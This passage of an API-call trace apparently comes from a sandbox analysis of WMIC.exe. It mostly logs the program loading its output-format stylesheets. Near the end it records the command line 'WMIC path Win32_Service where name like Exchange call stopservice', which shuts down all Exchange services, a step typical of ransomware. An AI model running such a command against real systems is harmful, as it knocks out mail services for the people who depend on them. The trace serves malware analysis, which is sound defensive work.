IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0309.918] malloc (_Size=0xc) returned 0x7d9838 [0309.918] malloc (_Size=0xc) returned 0x7d9850 [0309.918] SysStringLen (param_1="MOF") returned 0x3 [0309.918] SysStringLen (param_1="TABLE") returned 0x5 [0309.918] SysStringLen (param_1="MOF") returned 0x3 [0309.918] SysStringLen (param_1="LIST") returned 0x4 [0309.918] SysStringLen (param_1="MOF") returned 0x3 [0309.918] SysStringLen (param_1="RAWXML") returned 0x6 [0309.918] SysStringLen (param_1="LIST") returned 0x4 [0309.918] SysStringLen (param_1="MOF") returned 0x3 [0309.918] malloc (_Size=0x18) returned 0x7d2d00 [0309.918] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.918] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.918] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.918] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=8, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.918] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="csv.xsl") returned 0x0 [0309.919] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.919] malloc (_Size=0xc) returned 0x7d9880 [0309.919] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.919] free (_Block=0x7d9880) [0309.920] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0309.920] malloc (_Size=0xc) returned 0x7d9880 [0309.920] malloc (_Size=0xc) returned 0x7d98c8 [0309.920] SysStringLen (param_1="CSV") returned 0x3 [0309.920] SysStringLen (param_1="TABLE") returned 0x5 [0309.921] SysStringLen (param_1="CSV") returned 0x3 [0309.921] SysStringLen (param_1="LIST") returned 0x4 [0309.921] SysStringLen (param_1="CSV") returned 0x3 [0309.921] SysStringLen (param_1="HTABLE") returned 0x6 [0309.921] SysStringLen (param_1="CSV") returned 0x3 [0309.921] SysStringLen (param_1="HFORM") returned 0x5 [0309.921] malloc (_Size=0x18) returned 0x7d2a00 [0309.921] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.921] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.921] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.921] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=9, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.921] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.921] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.921] malloc (_Size=0xc) returned 0x7d98f8 [0309.921] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.922] free (_Block=0x7d98f8) [0309.922] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0309.922] malloc (_Size=0xc) returned 0x7d98f8 [0309.922] malloc (_Size=0xc) returned 0x7dac30 [0309.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.922] SysStringLen (param_1="TABLE") returned 0x5 [0309.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.922] SysStringLen (param_1="VALUE") returned 0x5 [0309.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.922] SysStringLen (param_1="XML") returned 0x3 [0309.922] SysStringLen (param_1="XML") returned 0x3 [0309.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.922] malloc (_Size=0x18) returned 0x7d2d40 [0309.922] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.922] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.922] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.922] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=10, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.922] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.922] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.923] malloc (_Size=0xc) returned 0x7dade0 [0309.923] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.923] free (_Block=0x7dade0) [0309.923] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0309.923] malloc (_Size=0xc) returned 0x7dade0 [0309.923] malloc (_Size=0xc) returned 0x7dad68 [0309.923] SysStringLen (param_1="texttablewsys") returned 0xd [0309.923] SysStringLen (param_1="TABLE") returned 0x5 [0309.923] SysStringLen (param_1="texttablewsys") returned 0xd [0309.923] SysStringLen (param_1="XML") returned 0x3 [0309.923] SysStringLen (param_1="texttablewsys") returned 0xd [0309.923] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.923] SysStringLen (param_1="XML") returned 0x3 [0309.923] SysStringLen (param_1="texttablewsys") returned 0xd [0309.923] malloc (_Size=0x18) returned 0x7d2ba0 [0309.923] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.923] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.923] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.923] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=11, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.923] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.924] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.924] malloc (_Size=0xc) returned 0x7daba0 [0309.924] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.924] free (_Block=0x7daba0) [0309.924] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0309.924] malloc (_Size=0xc) returned 0x7dab28 [0309.924] malloc (_Size=0xc) returned 0x7dacf0 [0309.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.924] SysStringLen (param_1="TABLE") returned 0x5 [0309.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.924] SysStringLen (param_1="XML") returned 0x3 [0309.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.924] malloc (_Size=0x18) returned 0x7d2ca0 [0309.924] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.924] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.924] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.924] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=12, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.925] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.925] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.925] malloc (_Size=0xc) returned 0x7dacc0 [0309.925] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.925] free (_Block=0x7dacc0) [0309.925] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0309.925] malloc (_Size=0xc) returned 0x7dacc0 [0309.925] malloc (_Size=0xc) returned 0x7dab88 [0309.925] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.925] SysStringLen (param_1="TABLE") returned 0x5 [0309.925] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.925] SysStringLen (param_1="XML") returned 0x3 [0309.925] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.925] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.925] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.925] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.925] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.925] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.925] malloc (_Size=0x18) returned 0x7d2d60 [0309.925] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.926] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.926] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.926] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=13, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.926] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.926] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.926] malloc (_Size=0xc) returned 0x7dadb0 [0309.926] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.926] free (_Block=0x7dadb0) [0309.926] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0309.926] malloc (_Size=0xc) returned 0x7daca8 [0309.926] malloc (_Size=0xc) returned 0x7dad38 [0309.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.926] SysStringLen (param_1="TABLE") returned 0x5 [0309.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.926] SysStringLen (param_1="XML") returned 0x3 [0309.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.926] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.926] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.926] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.927] malloc (_Size=0x18) returned 0x7d2ac0 [0309.927] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.927] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.927] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.927] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=14, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.927] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="texttable.xsl") returned 0x0 [0309.927] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.927] malloc (_Size=0xc) returned 0x7dad08 [0309.927] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.927] free (_Block=0x7dad08) [0309.927] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0309.927] malloc (_Size=0xc) returned 0x7dad80 [0309.927] malloc (_Size=0xc) returned 0x7dadb0 [0309.927] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0309.928] SysStringLen (param_1="TABLE") returned 0x5 [0309.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0309.928] SysStringLen (param_1="XML") returned 0x3 [0309.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0309.928] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0309.928] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0309.928] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.928] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0309.928] malloc (_Size=0x18) returned 0x7d2b80 [0309.928] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.928] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.928] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.928] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=15, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.928] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="htable.xsl") returned 0x0 [0309.928] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.929] malloc (_Size=0xc) returned 0x7daba0 [0309.929] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.929] free (_Block=0x7daba0) [0309.929] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0309.929] malloc (_Size=0xc) returned 0x7daba0 [0309.929] malloc (_Size=0xc) returned 0x7dac60 [0309.929] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0309.929] SysStringLen (param_1="TABLE") returned 0x5 [0309.929] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0309.929] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.929] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0309.929] SysStringLen (param_1="XML") returned 0x3 [0309.929] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0309.929] SysStringLen (param_1="texttablewsys") returned 0xd [0309.929] SysStringLen (param_1="XML") returned 0x3 [0309.929] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0309.929] malloc (_Size=0x18) returned 0x7d2c20 [0309.930] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.930] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.930] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.930] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=16, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.930] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="htable.xsl") returned 0x0 [0309.930] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.930] malloc (_Size=0xc) returned 0x7dad50 [0309.930] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.930] free (_Block=0x7dad50) [0309.930] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0309.930] malloc (_Size=0xc) returned 0x7dabb8 [0309.931] malloc (_Size=0xc) returned 0x7dad98 [0309.931] SysStringLen (param_1="htable-sortby") returned 0xd [0309.931] SysStringLen (param_1="TABLE") returned 0x5 [0309.931] SysStringLen (param_1="htable-sortby") returned 0xd [0309.931] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.931] SysStringLen (param_1="htable-sortby") returned 0xd [0309.931] SysStringLen (param_1="XML") returned 0x3 [0309.931] SysStringLen (param_1="htable-sortby") returned 0xd [0309.931] SysStringLen (param_1="texttablewsys") returned 0xd [0309.931] SysStringLen (param_1="htable-sortby") returned 0xd [0309.931] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0309.931] SysStringLen (param_1="XML") returned 0x3 [0309.931] SysStringLen (param_1="htable-sortby") returned 0xd [0309.931] malloc (_Size=0x18) returned 0x7d2a20 [0309.931] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.931] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.931] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.931] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=17, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.931] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="mof.xsl") returned 0x0 [0309.931] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.932] malloc (_Size=0xc) returned 0x7dacd8 [0309.932] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.932] free (_Block=0x7dacd8) [0309.932] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0309.932] malloc (_Size=0xc) returned 0x7dad08 [0309.932] malloc (_Size=0xc) returned 0x7dac78 [0309.932] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0309.932] SysStringLen (param_1="TABLE") returned 0x5 [0309.932] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0309.932] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.932] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0309.932] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.932] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0309.932] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.932] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.932] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0309.932] malloc (_Size=0x18) returned 0x7d2a40 [0309.932] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.932] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.932] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.932] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=18, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.933] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="mof.xsl") returned 0x0 [0309.933] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.933] malloc (_Size=0xc) returned 0x7dab58 [0309.933] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.933] free (_Block=0x7dab58) [0309.933] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0309.933] malloc (_Size=0xc) returned 0x7dadc8 [0309.933] malloc (_Size=0xc) returned 0x7dad50 [0309.933] SysStringLen (param_1="wmiclimofformat") returned 0xf [0309.933] SysStringLen (param_1="TABLE") returned 0x5 [0309.933] SysStringLen (param_1="wmiclimofformat") returned 0xf [0309.933] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.933] SysStringLen (param_1="wmiclimofformat") returned 0xf [0309.933] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.933] SysStringLen (param_1="wmiclimofformat") returned 0xf [0309.933] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0309.933] SysStringLen (param_1="wmiclimofformat") returned 0xf [0309.934] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0309.934] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.934] SysStringLen (param_1="wmiclimofformat") returned 0xf [0309.934] malloc (_Size=0x18) returned 0x7d2b60 [0309.934] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.934] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.934] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.934] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=19, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.934] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="textvaluelist.xsl") returned 0x0 [0309.934] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.934] malloc (_Size=0xc) returned 0x7dad20 [0309.934] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.934] free (_Block=0x7dad20) [0309.938] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0309.938] malloc (_Size=0xc) returned 0x7dac00 [0309.938] malloc (_Size=0xc) returned 0x7dac48 [0309.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0309.938] SysStringLen (param_1="TABLE") returned 0x5 [0309.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0309.938] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.938] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0309.938] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.939] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0309.939] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.939] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.939] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0309.939] malloc (_Size=0x18) returned 0x7d2a60 [0309.939] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.939] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.939] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.939] IXMLDOMNodeList:get_item (in: This=0x6d9ca0, index=20, listItem=0x11f7bc | out: listItem=0x11f7bc*=0x6d6b88) returned 0x0 [0309.939] IXMLDOMNode:get_text (in: This=0x6d6b88, text=0x11f7c0 | out: text=0x11f7c0*="textvaluelist.xsl") returned 0x0 [0309.939] IXMLDOMNode:get_attributes (in: This=0x6d6b88, attributeMap=0x11f7b8 | out: attributeMap=0x11f7b8*=0x6d9fa8) returned 0x0 [0309.939] malloc (_Size=0xc) returned 0x7dad20 [0309.940] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x6d9fa8, name="KEYWORD", namedItem=0x11f7b4 | out: namedItem=0x11f7b4*=0x6d9ff8) returned 0x0 [0309.940] free (_Block=0x7dad20) [0309.940] IXMLDOMNode:get_nodeValue (in: This=0x6d9ff8, value=0x11f774 | out: value=0x11f774*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0309.940] malloc (_Size=0xc) returned 0x7dadf8 [0309.940] malloc (_Size=0xc) returned 0x7dab10 [0309.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0309.940] SysStringLen (param_1="TABLE") returned 0x5 [0309.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0309.940] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0309.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0309.940] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0309.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0309.940] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0309.940] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0309.940] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0309.940] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0309.940] malloc (_Size=0x18) returned 0x7d2be0 [0309.940] IUnknown:Release (This=0x6d6b88) returned 0x0 [0309.941] IUnknown:Release (This=0x6d9fa8) returned 0x0 [0309.941] IUnknown:Release (This=0x6d9ff8) returned 0x0 [0309.941] IUnknown:Release (This=0x6d9ca0) returned 0x0 [0309.941] FreeThreadedDOMDocument:IUnknown:Release (This=0x6d6b48) returned 0x1 [0309.941] FreeThreadedDOMDocument:IUnknown:Release (This=0x6d45a8) returned 0x0 [0309.941] free (_Block=0x7d9940) [0309.941] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice" [0309.941] malloc (_Size=0xe0) returned 0x7daee8 [0309.941] memcpy_s (in: _Destination=0x7daee8, _DestinationSize=0xde, _Source=0x551b78, _SourceSize=0xd0 | out: _Destination=0x7daee8) returned 0x0 [0309.941] malloc (_Size=0xc) returned 0x7dab40 [0309.941] malloc (_Size=0xc) returned 0x7dad20 [0309.941] malloc (_Size=0xc) returned 0x7dacd8 [0309.942] malloc (_Size=0xc) returned 0x7dab58 [0309.942] malloc (_Size=0x80) returned 0x7dafd0 [0309.942] GetLocalTime (in: lpSystemTime=0x11f758 | out: lpSystemTime=0x11f758*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0xf, wMilliseconds=0x3df)) [0309.942] _vsnwprintf (in: _Buffer=0x7dafd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x11f738 | out: _Buffer="04-02-2020T08:29:15") returned 19 [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] malloc (_Size=0x8c) returned 0x7db058 [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] malloc (_Size=0x8c) returned 0x7db0f0 [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] lstrlenW (lpString=" path Win32_Service where \"name like '%%Exchange%%'\" call stopservice") returned 69 [0309.942] malloc (_Size=0xa) returned 0x7dabd0 [0309.942] lstrlenW (lpString="path") returned 4 [0309.942] _wcsicmp (_String1="path", 